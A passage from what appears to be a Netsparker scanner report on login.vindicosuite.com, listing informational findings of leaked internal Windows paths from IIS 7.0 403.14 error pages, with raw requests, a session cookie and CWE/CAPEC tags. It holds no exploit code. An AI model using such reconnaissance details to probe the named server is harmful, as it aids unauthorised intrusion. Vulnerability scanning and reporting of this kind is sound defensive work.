&lt;style type=&quot;text/css&quot;&gt; 
&lt;!-- 
body{margin:0;font-size:.7em;font-family:Verdana,Arial,Helvetica,sans-serif;background:#CBE1EF;} 
code{margin:0;color:#006600;font-size:1.1em;font-weight:bold;} 
.config_source code{font-size:.8em;color:#000000;} 
pre{margin:0;font-size:1.4em;word-wrap:break-word;} 
ul,ol{margin:10px 0 10px 40px;} 
ul.first,ol.first{margin-top:5px;} 
fieldset{padding:0 15px 10px 15px;} 
.summary-container fieldset{padding-bottom:5px;margin-top:4px;} 
legend.no-expand-all{padding:2px 15px 4px 10px;margin:0 0 0 -12px;} 
legend{color:#333333;padding:4px 15px 4px 10px;margin:4px 0 8px -12px;_margin-top:0px; 
 border-top:1px solid #EDEDED;border-left:1px solid #EDEDED;border-right:1px solid #969696; 
 border-bottom:1px solid #969696;background:#E7ECF0;font-weight:bold;font-size:1em;} 
a:link,a:visited{color:#007EFF;font-weight:bold;} 
a:hover{text-decoration:none;} 
h1{font-size:2.4em;margin:0;color:#FFF;} 
h2{font-size:1.7em;margin:0;color:#CC0000;} 
h3{font-size:1.4em;margin:10px 0 0 0;color:#CC0000;} 
h4{font-size:1.2em;margin:10px 0 5px 0; 
}#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:&quot;trebuchet MS&quot;,Verdana,sans-serif; 
 color:#FFF;background-color:#5C87B2; 
}#content{margin:0 0 0 2%;position:relative;} 
.summary-container,.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} 
.config_source{background:#fff5c4;} 
.content-container p{margin:0 0 10px 0; 
}#details-left{width:35%;float:left;margin-right:2%; 
}#details-right{width:63%;float:left; 
}#server_version{width:96%;_height:1px;min-height:1px;margin:0 0 5px 0;padding:11px 2% 8px 2%;color:#FFFFFF; 
 background-color:#5A7FA5;border-bottom:1px solid #C1CFDD;border-top:1px solid #4A6C8E;font-weight:normal; 
 font-size:1em;color:#FFF;text-align:right; 
}#server_version p{margin:5px 0;} 
table{margin:4px 0 4px 0;width:100%;border:none;} 
td,th{vertical-align:top;padding:3px 0;text-align:left;font-weight:bold;border:none;} 
th{width:30%;text-align:right;padding-right:2%;font-weight:normal;} 
thead th{background-color:#ebebeb;width:25%; 
}#details-right th{width:20%;} 
table tr.alt td,table tr.alt th{background-color:#ebebeb;} 
.highlight-code{color:#CC0000;font-weight:bold;font-style:italic;} 
.clear{clear:both;} 
.preferred{padding:0 5px 2px 5px;font-weight:normal;background:#006633;color:#FFF;font-size:.8em;} 
--&gt; 
&lt;/style&gt; 
 
&lt;/head&gt; 
&lt;body&gt; 
&lt;div id=&quot;header&quot;&gt;&lt;h1&gt;Server Error in Application &quot;LOGIN.VINDICOSUITE.COM&quot;&lt;/h1&gt;&lt;/div&gt; 
&lt;div id=&quot;server_version&quot;&gt;&lt;p&gt;Internet Information Services 7.0&lt;/p&gt;&lt;/div&gt; 
&lt;div id=&quot;content&quot;&gt; 
&lt;div class=&quot;content-container&quot;&gt; 
 &lt;fieldset&gt;&lt;legend&gt;Error Summary&lt;/legend&gt; 
  &lt;h2&gt;HTTP Error 403.14 - Forbidden&lt;/h2&gt; 
  &lt;h3&gt;The Web server is configured to not list the contents of this directory.&lt;/h3&gt; 
 &lt;/fieldset&gt; 
&lt;/div&gt; 
&lt;div class=&quot;content-container&quot;&gt; 
 &lt;fieldset&gt;&lt;legend&gt;Detailed Error Information&lt;/legend&gt; 
  &lt;div id=&quot;details-left&quot;&gt; 
   &lt;table border=&quot;0&quot; cellpadding=&quot;0&quot; cellspacing=&quot;0&quot;&gt; 
    &lt;tr class=&quot;alt&quot;&gt;&lt;th&gt;Module&lt;/th&gt;&lt;td&gt;DirectoryListingModule&lt;/td&gt;&lt;/tr&gt; 
    &lt;tr&gt;&lt;th&gt;Notification&lt;/th&gt;&lt;td&gt;ExecuteRequestHandler&lt;/td&gt;&lt;/tr&gt; 
    &lt;tr class=&quot;alt&quot;&gt;&lt;th&gt;Handler&lt;/th&gt;&lt;td&gt;StaticFile&lt;/td&gt;&lt;/tr&gt; 
    &lt;tr&gt;&lt;th&gt;Error Code&lt;/th&gt;&lt;td&gt;0x00000000&lt;/td&gt;&lt;/tr&gt; 
     
   &lt;/table&gt; 
  &lt;/div&gt; 
  &lt;div id=&quot;details-right&quot;&gt; 
   &lt;table border=&quot;0&quot; cellpadding=&quot;0&quot; cellspacing=&quot;0&quot;&gt; 
    &lt;tr class=&quot;alt&quot;&gt;&lt;th&gt;Requested URL&lt;/th&gt;&lt;td&gt;http://login.vindicosuite.com:80/App_Themes/Default/&lt;/td&gt;&lt;/tr&gt; 
    &lt;tr&gt;&lt;th&gt;Physical Path&lt;/th&gt;&lt;td&gt;d:\inetpub\login.vindicosuite.com\App_Themes\Default\&lt;/td&gt;&lt;/tr&gt; 
    &lt;tr class=&quot;alt&quot;&gt;&lt;th&gt;Logon Method&lt;/th&gt;&lt;td&gt;Anonymous&lt;/td&gt;&lt;/tr&gt; 
    &lt;tr&gt;&lt;th&gt;Logon User&lt;/th&gt;&lt;td&gt;Anonymous&lt;/td&gt;&lt;/tr&gt; 
     
   &lt;/table&gt; 
   &lt;div class=&quot;clear&quot;&gt;&lt;/div&gt; 
  &lt;/div&gt; 
 &lt;/fieldset&gt; 
&lt;/div&gt; 
&lt;div class=&quot;content-container&quot;&gt; 
 &lt;fieldset&gt;&lt;legend&gt;Most likely causes:&lt;/legend&gt; 
  &lt;ul&gt; 	&lt;li&gt;A default document is not configured for the requested URL, and directory browsing is not enabled on the server.&lt;/li&gt; &lt;/ul&gt; 
 &lt;/fieldset&gt; 
&lt;/div&gt; 
&lt;div class=&quot;content-container&quot;&gt; 
 &lt;fieldset&gt;&lt;legend&gt;Things you can try:&lt;/legend&gt; 
  &lt;ul&gt; 	&lt;li&gt;If you do not want to enable directory browsing, ensure that a default document is configured and that the file exists.&lt;/li&gt; 	&lt;li&gt;           Enable directory browsing using IIS Manager.           &lt;ol&gt; 			&lt;li&gt;Open IIS Manager.&lt;/li&gt; 			&lt;li&gt;In the Features view, double-click Directory Browsing.&lt;/li&gt; 			&lt;li&gt;On the Directory Browsing page, in the Actions pane, click Enable.&lt;/li&gt; 		&lt;/ol&gt; 	&lt;/li&gt; 	&lt;li&gt;Verify that the configuration/system.webServer/directoryBrowse@enabled attribute is set to true in the site or application configuration file.&lt;/li&gt; &lt;/ul&gt; 
 &lt;/fieldset&gt; 
&lt;/div&gt; 
 
 
&lt;div class=&quot;content-container&quot;&gt; 
 &lt;fieldset&gt;&lt;legend&gt;Links and More Information&lt;/legend&gt; 
  This error occurs when a document is not specified in the URL, no default document is specified for the Web site or application, and directory listing is not enabled for the Web site or application. This setting may be disabled on purpose to secure the contents of the server. 
  &lt;p&gt;&lt;a href=&quot;http://go.microsoft.com/fwlink/?LinkID=62293&amp;amp;IIS70Error=403,14,0x00000000,6002&quot;&gt;View more information &amp;raquo;&lt;/a&gt;&lt;/p&gt; 
   
 &lt;/fieldset&gt; 
&lt;/div&gt; 
&lt;/div&gt; 
&lt;/body&gt; 
&lt;/html&gt; 
 ]]></rawresponse>

		<extrainformation>
			<info name="Identified Internal Path(s)">d:\inetpub\login.vindicosuite.com\App_Themes\Default\</info>
		</extrainformation>


        <classification>
            <OWASP></OWASP>
            <WASC>13</WASC>
            <CWE>200</CWE>
            <CAPEC>118</CAPEC>
        </classification>
				
	</vulnerability>

	<vulnerability confirmed="False">
		<url>http://login.vindicosuite.com/AccountManager/</url>
		<type>PossibleInternalWindowsPathLeakage</type>
		<severity>Information</severity>
		

		<rawrequest><![CDATA[GET /AccountManager/ HTTP/1.1
Referer: http://login.vindicosuite.com/AccountManager/ResetPassword/index.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: login.vindicosuite.com
Cookie: ASPSESSIONIDSQCRCQDD=LPKJIJIDCKAPCHNHHEJMIBAL
Accept-Encoding: gzip, deflate
 ]]></rawrequest>
		<rawresponse><![CDATA[HTTP/1.1 403 Forbidden
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 20 Apr 2011 22:42:53 GMT
Content-Length: 5446


&lt;!DOCTYPE html PUBLIC &quot;-//W3C//DTD XHTML 1.0 Strict//EN&quot; &quot;http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd&quot;&gt; 
&lt;html xmlns=&quot;http://www.w3.org/1999/xhtml&quot;&gt; 
&lt;head&gt; 
&lt;title&gt;IIS 7.0 Detailed Error - 403.14 - Forbidden&lt;/title&gt; 
&lt;style type=&quot;text/css&quot;&gt; 
&lt;!-- 
body{margin:0;font-size:.7em;font-family:Verdana,Arial,Helvetica,sans-serif;background:#CBE1EF;} 
code{margin:0;color:#006600;font-size:1.1em;font-weight:bold;} 
.config_source code{font-size:.8em;color:#000000;} 
pre{margin:0;font-size:1.4em;word-wrap:break-word;} 
ul,ol{margin:10px 0 10px 40px;} 
ul.first,ol.first{margin-top:5px;} 
fieldset{padding:0 15px 10px 15px;} 
.summary-container fieldset{padding-bottom:5px;margin-top:4px;} 
legend.no-expand-all{padding:2px 15px 4px 10px;margin:0 0 0 -12px;} 
legend{color:#333333;padding:4px 15px 4px 10px;margin:4px 0 8px -12px;_margin-top:0px; 
 border-top:1px solid #EDEDED;border-left:1px solid #EDEDED;border-right:1px solid #969696; 
 border-bottom:1px solid #969696;background:#E7ECF0;font-weight:bold;font-size:1em;} 
a:link,a:visited{color:#007EFF;font-weight:bold;} 
a:hover{text-decoration:none;} 
h1{font-size:2.4em;margin:0;color:#FFF;} 
h2{font-size:1.7em;margin:0;color:#CC0000;} 
h3{font-size:1.4em;margin:10px 0 0 0;color:#CC0000;} 
h4{font-size:1.2em;margin:10px 0 5px 0; 
}#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:&quot;trebuchet MS&quot;,Verdana,sans-serif; 
 color:#FFF;background-color:#5C87B2; 
}#content{margin:0 0 0 2%;position:relative;} 
.summary-container,.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} 
.config_source{background:#fff5c4;} 
.content-container p{margin:0 0 10px 0; 
}#details-left{width:35%;float:left;margin-right:2%; 
}#details-right{width:63%;float:left; 
}#server_version{width:96%;_height:1px;min-height:1px;margin:0 0 5px 0;padding:11px 2% 8px 2%;color:#FFFFFF; 
 background-color:#5A7FA5;border-bottom:1px solid #C1CFDD;border-top:1px solid #4A6C8E;font-weight:normal; 
 font-size:1em;color:#FFF;text-align:right; 
}#server_version p{margin:5px 0;} 
table{margin:4px 0 4px 0;width:100%;border:none;} 
td,th{vertical-align:top;padding:3px 0;text-align:left;font-weight:bold;border:none;} 
th{width:30%;text-align:right;padding-right:2%;font-weight:normal;} 
thead th{background-color:#ebebeb;width:25%; 
}#details-right th{width:20%;} 
table tr.alt td,table tr.alt th{background-color:#ebebeb;} 
.highlight-code{color:#CC0000;font-weight:bold;font-style:italic;} 
.clear{clear:both;} 
.preferred{padding:0 5px 2px 5px;font-weight:normal;background:#006633;color:#FFF;font-size:.8em;} 
--&gt; 
&lt;/style&gt; 
 
&lt;/head&gt; 
&lt;body&gt; 
&lt;div id=&quot;header&quot;&gt;&lt;h1&gt;Server Error in Application &quot;LOGIN.VINDICOSUITE.COM&quot;&lt;/h1&gt;&lt;/div&gt; 
&lt;div id=&quot;server_version&quot;&gt;&lt;p&gt;Internet Information Services 7.0&lt;/p&gt;&lt;/div&gt; 
&lt;div id=&quot;content&quot;&gt; 
&lt;div class=&quot;content-container&quot;&gt; 
 &lt;fieldset&gt;&lt;legend&gt;Error Summary&lt;/legend&gt; 
  &lt;h2&gt;HTTP Error 403.14 - Forbidden&lt;/h2&gt; 
  &lt;h3&gt;The Web server is configured to not list the contents of this directory.&lt;/h3&gt; 
 &lt;/fieldset&gt; 
&lt;/div&gt; 
&lt;div class=&quot;content-container&quot;&gt; 
 &lt;fieldset&gt;&lt;legend&gt;Detailed Error Information&lt;/legend&gt; 
  &lt;div id=&quot;details-left&quot;&gt; 
   &lt;table border=&quot;0&quot; cellpadding=&quot;0&quot; cellspacing=&quot;0&quot;&gt; 
    &lt;tr class=&quot;alt&quot;&gt;&lt;th&gt;Module&lt;/th&gt;&lt;td&gt;DirectoryListingModule&lt;/td&gt;&lt;/tr&gt; 
    &lt;tr&gt;&lt;th&gt;Notification&lt;/th&gt;&lt;td&gt;ExecuteRequestHandler&lt;/td&gt;&lt;/tr&gt; 
    &lt;tr class=&quot;alt&quot;&gt;&lt;th&gt;Handler&lt;/th&gt;&lt;td&gt;StaticFile&lt;/td&gt;&lt;/tr&gt; 
    &lt;tr&gt;&lt;th&gt;Error Code&lt;/th&gt;&lt;td&gt;0x00000000&lt;/td&gt;&lt;/tr&gt; 
     
   &lt;/table&gt; 
  &lt;/div&gt; 
  &lt;div id=&quot;details-right&quot;&gt; 
   &lt;table border=&quot;0&quot; cellpadding=&quot;0&quot; cellspacing=&quot;0&quot;&gt; 
    &lt;tr class=&quot;alt&quot;&gt;&lt;th&gt;Requested URL&lt;/th&gt;&lt;td&gt;http://login.vindicosuite.com:80/AccountManager/&lt;/td&gt;&lt;/tr&gt; 
    &lt;tr&gt;&lt;th&gt;Physical Path&lt;/th&gt;&lt;td&gt;d:\inetpub\login.vindicosuite.com\AccountManager\&lt;/td&gt;&lt;/tr&gt; 
    &lt;tr class=&quot;alt&quot;&gt;&lt;th&gt;Logon Method&lt;/th&gt;&lt;td&gt;Anonymous&lt;/td&gt;&lt;/tr&gt; 
    &lt;tr&gt;&lt;th&gt;Logon User&lt;/th&gt;&lt;td&gt;Anonymous&lt;/td&gt;&lt;/tr&gt; 
     
   &lt;/table&gt; 
   &lt;div class=&quot;clear&quot;&gt;&lt;/div&gt; 
  &lt;/div&gt; 
 &lt;/fieldset&gt; 
&lt;/div&gt; 
&lt;div class=&quot;content-container&quot;&gt; 
 &lt;fieldset&gt;&lt;legend&gt;Most likely causes:&lt;/legend&gt; 
  &lt;ul&gt; 	&lt;li&gt;A default document is not configured for the requested URL, and directory browsing is not enabled on the server.&lt;/li&gt; &lt;/ul&gt; 
 &lt;/fieldset&gt; 
&lt;/div&gt; 
&lt;div class=&quot;content-container&quot;&gt; 
 &lt;fieldset&gt;&lt;legend&gt;Things you can try:&lt;/legend&gt; 
  &lt;ul&gt; 	&lt;li&gt;If you do not want to enable directory browsing, ensure that a default document is configured and that the file exists.&lt;/li&gt; 	&lt;li&gt;           Enable directory browsing using IIS Manager.           &lt;ol&gt; 			&lt;li&gt;Open IIS Manager.&lt;/li&gt; 			&lt;li&gt;In the Features view, double-click Directory Browsing.&lt;/li&gt; 			&lt;li&gt;On the Directory Browsing page, in the Actions pane, click Enable.&lt;/li&gt; 		&lt;/ol&gt; 	&lt;/li&gt; 	&lt;li&gt;Verify that the configuration/system.webServer/directoryBrowse@enabled attribute is set to true in the site or application configuration file.&lt;/li&gt; &lt;/ul&gt; 
 &lt;/fieldset&gt; 
&lt;/div&gt; 
 
 
&lt;div class=&quot;content-container&quot;&gt; 
 &lt;fieldset&gt;&lt;legend&gt;Links and More Information&lt;/legend&gt; 
  This error occurs when a document is not specified in the URL, no default document is specified for the Web site or application, and directory listing is not enabled for the Web site or application. This setting may be disabled on purpose to secure the contents of the server. 
  &lt;p&gt;&lt;a href=&quot;http://go.microsoft.com/fwlink/?LinkID=62293&amp;amp;IIS70Error=403,14,0x00000000,6002&quot;&gt;View more information &amp;raquo;&lt;/a&gt;&lt;/p&gt; 
   
 &lt;/fieldset&gt; 
&lt;/div&gt; 
&lt;/div&gt; 
&lt;/body&gt; 
&lt;/html&gt; 
 ]]></rawresponse>

		<extrainformation>
			<info name="Identified Internal Path(s)">d:\inetpub\login.vindicosuite.com\AccountManager\</info>
		</extrainformation>


        <classification>
            <OWASP></OWASP>
            <WASC>13</WASC>
            <CWE>200</CWE>
            <CAPEC>118</CAPEC>
        </classification>
				
	</vulnerability>

	<vulnerability confirmed="False">
		<url>http://login.vindicosuite.com/App_Themes/</url>
		<type>PossibleInternalWindowsPathLeakage</type>
		<severity>Information</severity>
		

		<rawrequest><![CDATA[GET /App_Themes/ HTTP/1.1
Referer: http://login.vindicosuite.com/App_Themes/Default/vindico.css
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: login.vindicosuite.com
Cookie: ASPSESSIONIDSQCRCQDD=LPKJIJIDCKAPCHNHHEJMIBAL
Accept-Encoding: gzip, deflate
 ]]></rawrequest>
		<rawresponse><![CDATA[HTTP/1.1 403 Forbidden
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 20 Apr 2011 22:42:53 GMT
Content-Length: 5438


&lt;!DOCTYPE html PUBLIC &quot;-//W3C//DTD XHTML 1.0 Strict//EN&quot; &quot;http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd&quot;&gt; 
&lt;html xmlns=&quot;http://www.w3.org/1999/xhtml&quot;&gt; 
&lt;head&gt; 
&lt;title&gt;IIS 7.0 Detailed Error - 403.14 - Forbidden&lt;/title&gt; 
&lt;style type=&quot;text/css&quot;&gt; 
&lt;!-- 
body{margin:0;font-size:.7em;font-family:Verdana,Arial,Helvetica,sans-serif;background:#CBE1EF;} 
code{margin:0;color:#006600;font-size:1.1em;font-weight:bold;} 
.config_source code{font-size:.8em;color:#000000;} 
pre{margin:0;font-size:1.4em;word-wrap:break-word;} 
ul,ol{margin:10px 0 10px 40px;} 
ul.first,ol.first{margin-top:5px;} 
fieldset{padding:0 15px 10px 15px;} 
.summary-container fieldset{padding-bottom:5px;margin-top:4px;} 
legend.no-expand-all{padding:2px 15px 4px 10px;margin:0 0 0 -12px;} 
legend{color:#333333;padding:4px 15px 4px 10px;margin:4px 0 8px -12px;_margin-top:0px; 
 border-top:1px solid #EDEDED;border-left:1px solid #EDEDED;border-right:1px solid #969696; 
 border-bottom:1px solid #969696;background:#E7ECF0;font-weight:bold;font-size:1em;} 
a:link,a:visited{color:#007EFF;font-weight:bold;} 
a:hover{text-decoration:none;} 
h1{font-size:2.4em;margin:0;color:#FFF;} 
h2{font-size:1.7em;margin:0;color:#CC0000;} 
h3{font-size:1.4em;margin:10px 0 0 0;color:#CC0000;} 
h4{font-size:1.2em;margin:10px 0 5px 0; 
}#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:&quot;trebuchet MS&quot;,Verdana,sans-serif; 
 color:#FFF;background-color:#5C87B2; 
}#content{margin:0 0 0 2%;position:relative;} 
.summary-container,.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} 
.config_source{background:#fff5c4;} 
.content-container p{margin:0 0 10px 0; 
}#details-left{width:35%;float:left;margin-right:2%; 
}#details-right{width:63%;float:left; 
}#server_version{width:96%;_height:1px;min-height:1px;margin:0 0 5px 0;padding:11px 2% 8px 2%;color:#FFFFFF; 
 background-color:#5A7FA5;border-bottom:1px solid #C1CFDD;border-top:1px solid #4A6C8E;font-weight:normal; 
 font-size:1em;color:#FFF;text-align:right; 
}#server_version p{margin:5px 0;} 
table{margin:4px 0 4px 0;width:100%;border:none;} 
td,th{vertical-align:top;padding:3px 0;text-align:left;font-weight:bold;border:none;} 
th{width:30%;text-align:right;padding-right:2%;font-weight:normal;} 
thead th{background-color:#ebebeb;width:25%; 
}#details-right th{width:20%;} 
table tr.alt td,table tr.alt th{background-color:#ebebeb;} 
.highlight-code{color:#CC0000;font-weight:bold;font-style:italic;} 
.clear{clear:both;} 
.preferred{padding:0 5px 2px 5px;font-weight:normal;background:#006633;color:#FFF;font-size:.8em;} 
--&gt; 
&lt;/style&gt; 
 
&lt;/head&gt; 
&lt;body&gt; 
&lt;div id=&quot;header&quot;&gt;&lt;h1&gt;Server Error in Application &quot;LOGIN.VINDICOSUITE.COM&quot;&lt;/h1&gt;&lt;/div&gt; 
&lt;div id=&quot;server_version&quot;&gt;&lt;p&gt;Internet Information Services 7.0&lt;/p&gt;&lt;/div&gt; 
&lt;div id=&quot;content&quot;&gt; 
&lt;div class=&quot;content-container&quot;&gt; 
 &lt;fieldset&gt;&lt;legend&gt;Error Summary&lt;/legend&gt; 
  &lt;h2&gt;HTTP Error 403.14 - Forbidden&lt;/h2&gt; 
  &lt;h3&gt;The Web server is configured to not list the contents of this directory.&lt;/h3&gt; 
 &lt;/fieldset&gt; 
&lt;/div&gt; 
&lt;div class=&quot;content-container&quot;&gt; 
 &lt;fieldset&gt;&lt;legend&gt;Detailed Error Information&lt;/legend&gt; 
  &lt;div id=&quot;details-left&quot;&gt; 
   &lt;table border=&quot;0&quot; cellpadding=&quot;0&quot; cellspacing=&quot;0&quot;&gt; 
    &lt;tr class=&quot;alt&quot;&gt;&lt;th&gt;Module&lt;/th&gt;&lt;td&gt;DirectoryListingModule&lt;/td&gt;&lt;/tr&gt; 
    &lt;tr&gt;&lt;th&gt;Notification&lt;/th&gt;&lt;td&gt;ExecuteRequestHandler&lt;/td&gt;&lt;/tr&gt; 
    &lt;tr class=&quot;alt&quot;&gt;&lt;th&gt;Handler&lt;/th&gt;&lt;td&gt;StaticFile&lt;/td&gt;&lt;/tr&gt; 
    &lt;tr&gt;&lt;th&gt;Error Code&lt;/th&gt;&lt;td&gt;0x00000000&lt;/td&gt;&lt;/tr&gt; 
     
   &lt;/table&gt; 
  &lt;/div&gt; 
  &lt;div id=&quot;details-right&quot;&gt; 
   &lt;table border=&quot;0&quot; cellpadding=&quot;0&quot; cellspacing=&quot;0&quot;&gt; 
    &lt;tr class=&quot;alt&quot;&gt;&lt;th&gt;Requested URL&lt;/th&gt;&lt;td&gt;http://login.vindicosuite.com:80/App_Themes/&lt;/td&gt;&lt;/tr&gt; 
    &lt;tr&gt;&lt;th&gt;Physical Path&lt;/th&gt;&lt;td&gt;d:\inetpub\login.vindicosuite.com\App_Themes\&lt;/td&gt;&lt;/tr&gt; 
    &lt;tr class=&quot;alt&quot;&gt;&lt;th&gt;Logon Method&lt;/th&gt;&lt;td&gt;Anonymous&lt;/td&gt;&lt;/tr&gt; 
    &lt;tr&gt;&lt;th&gt;Logon User&lt;/th&gt;&lt;td&gt;Anonymous&lt;/td&gt;&lt;/tr&gt; 
     
   &lt;/table&gt; 
   &lt;div class=&quot;clear&quot;&gt;&lt;/div&gt; 
  &lt;/div&gt; 
 &lt;/fieldset&gt; 
&lt;/div&gt; 
&lt;div class=&quot;content-container&quot;&gt; 
 &lt;fieldset&gt;&lt;legend&gt;Most likely causes:&lt;/legend&gt; 
  &lt;ul&gt; 	&lt;li&gt;A default document is not configured for the requested URL, and directory browsing is not enabled on the server.&lt;/li&gt; &lt;/ul&gt; 
 &lt;/fieldset&gt; 
&lt;/div&gt; 
&lt;div class=&quot;content-container&quot;&gt; 
 &lt;fieldset&gt;&lt;legend&gt;Things you can try:&lt;/legend&gt; 
  &lt;ul&gt; 	&lt;li&gt;If you do not want to enable directory browsing, ensure that a default document is configured and that the file exists.&lt;/li&gt; 	&lt;li&gt;           Enable directory browsing using IIS Manager.           &lt;ol&gt; 			&lt;li&gt;Open IIS Manager.&lt;/li&gt; 			&lt;li&gt;In the Features view, double-click Directory Browsing.&lt;/li&gt; 			&lt;li&gt;On the Directory Browsing page, in the Actions pane, click Enable.&lt;/li&gt; 		&lt;/ol&gt; 	&lt;/li&gt; 	&lt;li&gt;Verify that the configuration/system.webServer/directoryBrowse@enabled attribute is set to true in the site or application configuration file.&lt;/li&gt; &lt;/ul&gt; 
 &lt;/fieldset&gt; 
&lt;/div&gt; 
 
 
&lt;div class=&quot;content-container&quot;&gt; 
 &lt;fieldset&gt;&lt;legend&gt;Links and More Information&lt;/legend&gt; 
  This error occurs when a document is not specified in the URL, no default document is specified for the Web site or application, and directory listing is not enabled for the Web site or application. This setting may be disabled on purpose to secure the contents of the server. 
  &lt;p&gt;&lt;a href=&quot;http://go.microsoft.com/fwlink/?LinkID=62293&amp;amp;IIS70Error=403,14,0x00000000,6002&quot;&gt;View more information &amp;raquo;&lt;/a&gt;&lt;/p&gt; 
   
 &lt;/fieldset&gt; 
&lt;/div&gt; 
&lt;/div&gt; 
&lt;/body&gt; 
&lt;/html&gt; 
 ]]></rawresponse>

		<extrainformation>
			<info name="Identified Internal Path(s)">d:\inetpub\login.vindicosuite.com\App_Themes\</info>
		</extrainformation>


        <classification>
            <OWASP></OWASP>
            <WASC>13</WASC>
            <CWE>200</CWE>
            <CAPEC>118</CAPEC>
        </classification>
				
	</vulnerability>

</netsparker>
